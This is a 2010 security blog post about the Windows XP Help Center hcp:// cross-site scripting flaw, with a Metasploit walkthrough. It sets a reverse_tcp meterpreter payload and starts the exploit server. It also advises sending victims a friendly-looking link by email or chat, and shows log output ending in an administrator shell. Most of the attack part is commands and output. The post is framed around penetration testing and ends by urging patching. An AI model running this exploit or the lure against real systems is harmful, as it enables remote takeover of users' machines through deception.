SecureState Blog

Read SecureState's award winning blog.

With the patch Tuesday release of XP zero days last week i started checking around for Proof of concepts and ran across the following posts.

The above advisories are for windows XP which many businesses still run, and utilizes a XSS attack which many developers and site owners feel is’t really a threat, read below to find out why XSS is dangerous.

After reading the above advisories I checked in metasploit and a working exploit is already available within the exploit framework.

If you are on an internal or client side test penetration test you generally see most clients running windows XP and generally outdated browsers. They are either using IE6 or IE7 or IE8. The above advisories describe a way of using a cross site scripting attack to gain full control of the victim. The essence of this attack is that an un-handled XSS is utilized in hcp://system/sysinfo/sysinfomain.htm?svr=, which can be directly accessed via a url in a browser. By using a defer in a XSS to execute a script in a privileged zone a windows popup is bypassed thus not needing a victim to click any annoying popups to make the attack work.

<script defer>code</script>

“due to insufficient escaping in GetServerName() from sysinfo/commonFunc.js, the page is vulnerable
to a DOM-type XSS. However, the escaping routine will abort encoding if characters such as ‘=’ or ‘”‘ or others are specified. ”

The help center exploit works on xp sp2 and sp3 which covers most clients in most companies. I do not see many companies running vista or windows7…. IE6 and IE7 browsers are vulnerable to this attack without a popup however IE8 works but with a user popup box unless the victim is running certain versions of media player… I also just tested this with a IE8 browser running in comparability mode… When the client visited the page Automatically the exploit pulled up the help docs and gave me a meterpreter shell, wooooot
I am thinking this would be a good exploit to use in client side penetration tests… So below is the info and a quick usage of the exploit…

Module Name:

Below is a description and then usage of the module… give it a try…

Description: (From Metasploit)
“Help and Support Center is the default application provided to
access online documentation for Microsoft Windows. Microsoft
supports accessing help documents directly via URLs by installing a
protocol handler for the scheme “hcp”. Due to an error in validation
of input to hcp:// combined with a local cross site scripting
vulnerability and a specialized mechanism to launch the XSS trigger,
arbitrary command execution can be achieved. On IE6 and IE7 on XP
SP2 or SP3, code execution is automatic. On IE8, a dialog box pops,
but if WMP9 is installed, WMP9 can be used for automatic execution.
If IE8 and WMP11, a dialog box will ask the user if execution should
continue. Automatic detection of these options is implemented in
this module, and will default to not sending the exploit for
IE8/WMP11 unless the option is overridden.”

Simple Usage Example:
msf > use windows/browser/ms10_xxx_helpctr_xss_cmd_exec
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set LHOST
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set LPORT 5555
LPORT => 5555
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on
[*] Using URL:
[*] Local IP:
[*] Server started.


Send Your Link to the Victim and wait:

Now send the victim out a link to your IP address via email or chat. Generally i would have a registered URL that looks friendly and send them that URL in order to not look too suspicious. msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > [*] Request for “/” does not contain a sub-directory, redirecting to /c3hfRM5Kh/ …
[*] Sending Microsoft Help Center XSS and Command Execution to…
[*] Responding to request for exploit iframe at…
[*] Request for “/” does not contain a sub-directory, redirecting to /ETnOhHE9EqYirlA/ …
[*] Responding to WebDAV OPTIONS request from
[*] Request for “/Vl” does not contain a sub-directory, redirecting to /Vl/ …
[*] Received WebDAV PROPFIND request from
[*] Sending directory multistatus for /Vl/ …
[*] Received WebDAV PROPFIND request from
[*] Sending EXE multistatus for /Vl/ly.exe …
[*] Request for “/Vl” does not contain a sub-directory, redirecting to /Vl/ …
[*] Received WebDAV PROPFIND request from
[*] Sending directory multistatus for /Vl/ …
[*] GET for payload received.
[*] Sending stage (748032 bytes) to
[*] Meterpreter session 1 opened ( -> at Fri Jun 11 18:10:38 -0400 2010msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > sessions -l
Active sessions
Id Type Information Connection
– —- ———– ———-
1 meterpreter EXPLOITAdministrator @ EXPLOIT ->
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > sessions -i 1
[*] Starting interaction with 1…
meterpreter > getuid
Server username: EXPLOITAdministratorFinal Notes:
With the coming of a new patch tuesday, a whole slew of exploits are available for windows XP. The moral of the story is, UPDATE YOUR SYSTEMS.The metasploit module above sets up a server and waits for your victim to make a connection, when the victim does make a connection a help window is opened and they are silently owned…. More then likely the victim will just think windows is acting up as windows usually does or perhaps the user accidentally clicked something :) :)